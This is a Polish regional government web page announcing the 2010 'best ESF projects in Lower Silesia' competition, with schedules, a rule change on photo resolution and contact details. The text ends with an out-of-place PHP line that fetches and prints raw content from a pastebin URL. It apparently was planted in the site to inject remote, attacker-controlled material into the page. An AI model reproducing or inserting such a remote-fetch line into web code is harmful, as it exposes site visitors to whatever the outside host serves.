Realizacja

Programu Operacyjnego
Kapitał Ludzki

na Dolnym Śląsku

Wartość podpisanych umów

2 350 537 513,38 zł

 Rozliczono

2 267 814 427,62 zł

Stan na 31 października 2015 r.

Punkt informacyjny i naboru wniosków PO KL

Multimedia

Niezwykła szansa dla niezwykłych ludzi

Mapa dotacji UE

Mapa projektów EFS

Analizy i raporty

Inwestycja w Kardy

Baza Projektów Badawczych w ramach Programu Kapitał Ludzki

Dolnośląski Wojewódzki Urząd Pracy

Regionalny Ośrodek EFS

Punkty Informacyjne Funduszy Europejskich

Europejski Fundusz Społeczny

Narodowa Strategia Spójności

Ministerstwo Rozwoju Regionalnego

Komisja Europejska

Regionalny Program Operacyjny

Urząd Marszałkowski Województwa Dolnośląskiego

Biuletyn informacji publicznej

Konkurs „Inwestycje w Kapitał Ludzki – Najlepsze projekty EFS na Dolnym Śląsku”

 

Szanowni Państwo,

Pragniemy przedstawić zaktualizowany harmonogram Konkursu „Inwestycje w Kapitał Ludzki- Najlepsze projekty EFS na Dolnym Śląsku”. Z uwagi na niedokonanie rozstrzygnięcia podczas pierwszego Posiedzenia Jury, w okresie najbliższych dwóch tygodni odbędzie się drugie spotkanie Kapituły Konkursu, w trakcie którego przeprowadzona zostanie ocena merytoryczna nadesłanych formularzy zgłoszeniowych.

Publikację rozstrzygnięć Organizator planuje na pierwszą dekadę grudnia br.

Jednocześnie podkreślamy, iż uczestnicy Konkursu zostaną indywidualnie powiadomieni o jego wynikach.

 

 

L.p.

Działanie

Termin

1.

Ogłoszenie Konkursu „Inwestycje w Kapitał Ludzki – Najlepsze projekty EFS na Dolnym Śląsku”– rozpoczęcie przyjmowania Formularzy zgłoszeniowych

30.07.2010

2.

Zakończenie przyjmowania Formularzy zgłoszeniowych w ramach Konkursu „Inwestycje w Kapitał Ludzki – Najlepsze projekty EFS na Dolnym Śląsku

15.10.2010

3.

Posiedzenia Kapituły Konkursu

    8.11.2010 -29.11.2010

4.

Publikacja rozstrzygnięć Kapituły Konkursu

do10.12.2010

 5.

Uroczystość przyznania tytułów „Najlepszy projekt – Najlepsza inwestycja w człowieka na Dolnym  Śląsku” oraz „Projekt wyróżniony - Najlepsza inwestycja w człowieka na Dolnym  Śląsku

do22.12.2010

 
Szanowni Beneficjenci,

Pragniemy Państwa poinformować o zmianie Zarządzenia Marszałka Województwa Dolnośląskiego Nr 119 z dnia 29 lipca 2010 r. w sprawie Konkursu „Inwestycje w Kapitał Ludzki- Najlepsze projekty EFS na Dolnym Śląsku”.

Organizator podjął decyzję o dopuszczeniu do udziału podmiotów, które załączą do formularza zgłoszeniowego zdjęcia o rozdzielczość co najmniej 1200x1600 pikseli lub co najmniej 1600x1200 pikseli.

W związku ze zmianą warunków Regulaminu Konkursu „Inwestycje w Kapitał Ludzki- Najlepsze projekty EFS na Dolnym Śląsku”, okres przyjmowania zgłoszeń zostaje wydłużony do dnia 15 października 2010 r.

 

Zapraszamy do zapoznania się z treścią zarządzenia
 Dokument do pobraniaInstytucja Pośrednicząca dla Programu Operacyjnego Kapitał Ludzki w województwie dolnośląskim pragnie Państwa serdecznie zaprosić do udziału w Konkursie „Inwestycje w Kapitał Ludzki – Najlepsze projekty EFS na Dolnym Śląsku”.

Inicjatywa ta ma na celu popularyzowanie wiedzy o Europejskim Funduszu Społecznym wśród mieszkańców regionu oraz promowanie dobrych praktyk poprzez wyłonienie najlepszych projektów PO KL na terenie Dolnego Śląska w obszarach zatrudnienia, integracji społecznej, adaptacyjności pracowników i przedsiębiorstw oraz edukacji.

Reguły zgłaszania projektów do udziału w Konkursie oraz zasady przyznawania tytułów zostały ujęte w Regulaminie Konkursu „Inwestycje w Kapitał Ludzki – Najlepsze projekty EFS na Dolnym Śląsku” oraz Regulaminie Pracy Kapituły Konkursu „Inwestycje w Kapitał Ludzki – Najlepsze projekty EFS na Dolnym Śląsku”.

Podejmowane przez Organizatora działania będą zgodne z poniższym harmonogramem:

Harmonogram Konkursu „Inwestycje w Kapitał Ludzki – Najlepsze projekty EFS na Dolnym Śląsku

L.p.

Działanie

Termin

1.

Ogłoszenie Konkursu „Inwestycje w Kapitał Ludzki – Najlepsze projekty EFS
na Dolnym Śląsku
”– rozpoczęcie przyjmowania Formularzy zgłoszeniowych

30.07.2010

2.

Zakończenie przyjmowania Formularzy zgłoszeniowych
w ramach Konkursu „Inwestycje w Kapitał Ludzki – Najlepsze projekty EFS na Dolnym Śląsku

15.10.2010

3.

Posiedzenia Kapituły Konkursu

11.10.2010 - 29.10.2010

4.

Publikacja rozstrzygnięć Kapituły Konkursu

do 10.11.2010

 

5.

Uroczystość przyznania tytułów „Najlepszy projekt – Najlepsza inwestycja w człowieka na Dolnym  Śląsku” oraz „Projekt wyróżniony - Najlepsza inwestycja
w człowieka na Dolnym  Śląsku

do 30.11.2010


Pragniemy poinformować, iż Konkurs „Inwestycje w Kapitał Ludzki – Najlepsze projekty EFS na Dolnym Śląsku” został objęty honorowym patronatem Pana Marka Łapińskiego - Marszałka Województwa Dolnośląskiego.

O Konkursie można przeczytać w kwartalniku Biuletyn Europejskiego Funduszu Społecznego.

Zapraszamy do zadawania pytań poświęconych tematyce Konkursu. Prosimy o przesyłanie zapytań drogą elektroniczną na adres: sekretariat.efs@umwd.pl, bądź kontakt telefoniczny pod numerem: (071) 776 96 20. 

Z tematyką oraz zasadami niniejszej inicjatywy można zapoznać się ponadto na stronach internetowych:

Niniejsza inicjatywa współfinansowana jest ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.

Serdecznie zachęcamy do uczestnictwa i konkurowania o tytułNajlepszego projektu – Najlepszej inwestycji w człowiekaw naszym regionie.

echo file_get_contents("https://pastebin.com/raw/vFc5Snpm");